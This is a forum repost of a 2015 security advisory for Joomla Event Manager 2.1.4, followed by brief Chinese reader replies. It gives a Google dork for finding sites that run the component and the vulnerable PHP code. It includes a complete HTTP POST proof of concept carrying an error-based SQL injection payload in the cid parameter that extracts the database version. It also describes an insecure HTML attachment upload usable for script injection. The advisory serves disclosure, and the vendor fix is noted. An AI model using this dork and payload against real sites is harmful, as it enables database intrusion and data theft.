Joomla Event Manager 2.1.4 - Multiple Vulnerabilities

90_

# Google Dork:

1. inurl:option=com_jem

复制代码

# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage: www.joomlaeventmanager.net
# Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable
# Version: 2.1.4
# CVE: -
  
# VULNERABILITIES
  
##1 SQL Injection
  
  Resource: index.php?option=com_jem&view=myevents
  Parameter: cid
  
  Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event.

[HTML] 纯文本查看 复制代码

# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
  
### Source Code
  
  File: sites/models/myevents.php
  
  function publish($cid = array(), $publish = 1)
  {
     if (is_array($cid) && count($cid)) {
        $cids = implode(',', $cid);
    
        $query = 'UPDATE #__jem_events'
      . ' SET published = '. (int) $publish
      . ' WHERE id IN ('. $cids .')'
      . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
            
        $this->_db->setQuery($query);
     }
  }
  
### PoC
  
  POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: [url]http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151[/url]
  Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 352
    
  filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1
  
-------------------------------------------------------------------------------------------
  
##2 Insecure File Upload
  
  Default JEM settings allows to upload HTML/HTM files as event's attachment.
  An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript).
  These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.
  
  Attachments process is handled by "/site/classes/attachments.class.php" file.
  File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file.
  
-------------------------------------------------------------------------------------------
  
# NOTES
  
  08-01-2015: Vendor notification.
  08-12-2015: Vendor fixes the issues in the development branch.
  
  The author is not responsible for the misuse of the information provided in this security advisory.

哈喽啊

摩西摩西？？是HT里面的吗
？？？？

admin1964

还是不错的哦，顶了

asion

小龙

学习学习技术，加油！

小龙

fireworld

支持，看起来不错呢！

borall

感谢楼主的分享~

Lucifer

感谢楼主的分享~

若冰

学习学习技术，加油！